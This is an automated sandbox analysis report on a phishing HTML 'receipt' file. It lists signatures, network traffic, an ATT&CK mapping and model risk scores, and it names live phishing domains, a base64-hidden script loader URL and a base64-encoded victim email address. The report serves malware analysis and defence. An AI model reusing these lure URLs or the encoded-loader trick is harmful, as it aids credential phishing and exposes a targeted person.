Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ELECTRONIC RECEIPT_Xfab.html

Overview

General Information

Sample name:ELECTRONIC RECEIPT_Xfab.html
Analysis ID:1446960
MD5:a68191d730aaeda73cabfb744b85a9cb
SHA1:871d6ce4a0b1e726a265e642f2e29f1ab6034b42
SHA256:900944ba697864f0f8755e8cbfd2df096ec56d570ced06eba7165b25e8b7a01e

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML file submission requesting Cloudflare captcha challenge
Multi AV Scanner detection for domain / URL
Yara detected BlockedWebSite
AI detected suspicious javascript
Detected javascript redirector / loader
HTML Script injector detected
HTML document with suspicious name
HTML document with suspicious title
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\ELECTRONIC RECEIPT_Xfab.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2044,i,13012545366340206302,7728538976337955087,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
2.2.pages.csvJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
    2.2.pages.csvJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
      2.2.pages.csvJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
        2.2.pages.csvJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: tutors.picassoschools.ac.bwVirustotal: Detection: 5%Perma Link

          Phishing

          barindex
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://cahgscade.ru.net/a0zoZP/index.html' is highly suspicious as it does not match the legitimate domain name for Microsoft, which is 'microsoft.com'. The page contains a login form, which is a common element in phishing sites. The domain 'ru.net' is unusual for a Microsoft login page, indicating a high likelihood of phishing. The site uses social engineering techniques by mimicking the legitimate Microsoft login page. DOM: 3.7.pages.csv
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: file:///C:/Users/user/Desktop/ELECTRONIC%20RECEIPT_Xfab.htmlLLM: Score: 8 Reasons: The code dynamically injects a script element into the document head with a source URL that is base64 encoded. This technique is often used to obfuscate malicious activity. The decoded URL points to a PHP script on a non-reputable domain, which is a common characteristic of phishing or malicious sites. DOM: 0.0.pages.csv
          Source: ELECTRONIC RECEIPT_Xfab.htmlHTTP Parser: Low number of body elements: 0
          Source: file:///C:/Users/user/Desktop/ELECTRONIC%20RECEIPT_Xfab.htmlHTTP Parser: New script tag found
          Source: file:///C:/Users/user/Desktop/ELECTRONIC%20RECEIPT_Xfab.htmlTab title: ELECTRONIC RECEIPT_Xfab.html
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: Number of links: 0
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: Total embedded image size: 45708
          Source: ELECTRONIC RECEIPT_Xfab.htmlHTTP Parser: Base64 decoded: https://tutors.picassoschools.ac.bw/404.php?2-797967704b53693230746450547378494c30354f54456e564b7972567930737430553830714d7150437444507a45744a7264444c4b4d6e4e4151413d-APwqjMTjb
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: Title: rpQkSUSjK does not match URL
          Source: https://tutors.picassoschools.ac.bw/404.phpHTTP Parser: No favicon
          Source: https://cahgscade.ru.net/a0zoZP/index.html#YYmF1ZG9pbi5kZS1idXNzeUB4ZmFiLmNvbQ==HTTP Parser: No favicon
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/da3ds/0x4AAAAAAAaukL4AS3nPApw3/auto/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/da3ds/0x4AAAAAAAaukL4AS3nPApw3/auto/normalHTTP Parser: No favicon
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: No favicon
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: No favicon
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: No favicon
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: No <meta name="author".. found
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: No <meta name="author".. found
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: No <meta name="copyright".. found
          Source: https://cahgscade.ru.net/a0zoZP/index.htmlHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49724 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49730 version: TLS 1.2
          Source: chrome.exeMemory has grown: Private usage: 1MB later: 28MB
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.96.120
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: tutors.picassoschools.ac.bw
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: href.li
          Source: global trafficDNS traffic detected: DNS query: cahgscade.ru.net
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49724 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49730 version: TLS 1.2

          System Summary

          barindex
          Source: Name includes: ELECTRONIC RECEIPT_Xfab.htmlInitial sample: receipt
          Source: classification engineClassification label: mal92.phis.evad.winHTML@19/13@34/184
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\ELECTRONIC RECEIPT_Xfab.html
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2044,i,13012545366340206302,7728538976337955087,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2044,i,13012545366340206302,7728538976337955087,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: Window RecorderWindow detected: More than 3 window changes detected

          Data Obfuscation

          barindex
          Source: https://tutors.picassoschools.ac.bw/404.phpHTTP Parser: https://tutors.picassoschools.ac.bw/404.php
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Extra Window Memory Injection
          1
          Extra Window Memory Injection
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          ELECTRONIC RECEIPT_Xfab.html5%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          tutors.picassoschools.ac.bw5%VirustotalBrowse
          cdnjs.cloudflare.com0%VirustotalBrowse
          www.google.com0%VirustotalBrowse
          href.li1%VirustotalBrowse
          cahgscade.ru.net0%VirustotalBrowse
          challenges.cloudflare.com0%VirustotalBrowse
          a.nel.cloudflare.com0%VirustotalBrowse
          cdn.jsdelivr.net0%VirustotalBrowse
          code.jquery.com1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          file:///C:/Users/user/Desktop/ELECTRONIC%20RECEIPT_Xfab.html0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          a.nel.cloudflare.com
          35.190.80.1
          truefalseunknown
          code.jquery.com
          151.101.2.137
          truefalseunknown
          cdnjs.cloudflare.com
          104.17.24.14
          truefalseunknown
          challenges.cloudflare.com
          104.17.2.184
          truefalseunknown
          www.google.com
          142.250.181.228
          truefalseunknown
          cahgscade.ru.net
          188.114.96.3
          truetrueunknown
          tutors.picassoschools.ac.bw
          50.87.20.66
          truetrueunknown
          href.li
          192.0.78.27
          truefalseunknown
          cdn.jsdelivr.net
          unknown
          unknownfalseunknown
          NameMaliciousAntivirus DetectionReputation
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/da3ds/0x4AAAAAAAaukL4AS3nPApw3/auto/normalfalse
            unknown
            https://cahgscade.ru.net/a0zoZP/index.html#YYmF1ZG9pbi5kZS1idXNzeUB4ZmFiLmNvbQ==false
              unknown
              file:///C:/Users/user/Desktop/ELECTRONIC%20RECEIPT_Xfab.htmltrue
              • Avira URL Cloud: safe
              unknown
              https://tutors.picassoschools.ac.bw/404.phptrue
                unknown
                https://cahgscade.ru.net/a0zoZP/index.htmltrue
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  104.17.24.14
                  cdnjs.cloudflare.comUnited States
                  13335CLOUDFLARENETUSfalse
                  1.1.1.1
                  unknownAustralia
                  13335CLOUDFLARENETUSfalse
                  142.250.74.206
                  unknownUnited States
                  15169GOOGLEUSfalse
                  104.18.187.31
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  74.125.71.84
                  unknownUnited States
                  15169GOOGLEUSfalse
                  172.217.18.3
                  unknownUnited States
                  15169GOOGLEUSfalse
                  50.87.20.66
                  tutors.picassoschools.ac.bwUnited States
                  46606UNIFIEDLAYER-AS-1UStrue
                  142.250.185.227
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.185.106
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.185.238
                  unknownUnited States
                  15169GOOGLEUSfalse
                  192.0.78.27
                  href.liUnited States
                  2635AUTOMATTICUSfalse
                  104.17.3.184
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  151.101.2.137
                  code.jquery.comUnited States
                  54113FASTLYUSfalse
                  239.255.255.250
                  unknownReserved
                  unknownunknownfalse
                  142.250.181.228
                  www.google.comUnited States
                  15169GOOGLEUSfalse
                  188.114.96.3
                  cahgscade.ru.netEuropean Union
                  13335CLOUDFLARENETUStrue
                  35.190.80.1
                  a.nel.cloudflare.comUnited States
                  15169GOOGLEUSfalse
                  104.17.2.184
                  challenges.cloudflare.comUnited States
                  13335CLOUDFLARENETUSfalse
                  IP
                  192.168.2.16
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1446960
                  Start date and time:2024-05-24 05:39:28 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:15
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Sample name:ELECTRONIC RECEIPT_Xfab.html
                  Detection:MAL
                  Classification:mal92.phis.evad.winHTML@19/13@34/184
                  Cookbook Comments:
                  • Found application associated with file extension: .html
                  • Exclude process from analysis (whitelisted): dllhost.exe
                  • Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.74.206, 74.125.71.84
                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
                  • Not all processes where analyzed, report is missing behavior information
                  InputOutput
                  URL: file:///C:/Users/user/Desktop/ELECTRONIC%20RECEIPT_Xfab.html Model: gpt-4o
                  ```json
                  {
                    "riskscore": 8,
                    "reasons": "The code dynamically injects a script element into the document head with a source URL that is base64 encoded. This technique is often used to obfuscate malicious activity. The decoded URL points to a PHP script on a non-reputable domain, which is a common characteristic of phishing or malicious sites."
                  }
                  var APwqjMTjb = "YmF1ZG9pbi5kZS1idXNzeUB4ZmFiLmNvbQ==";
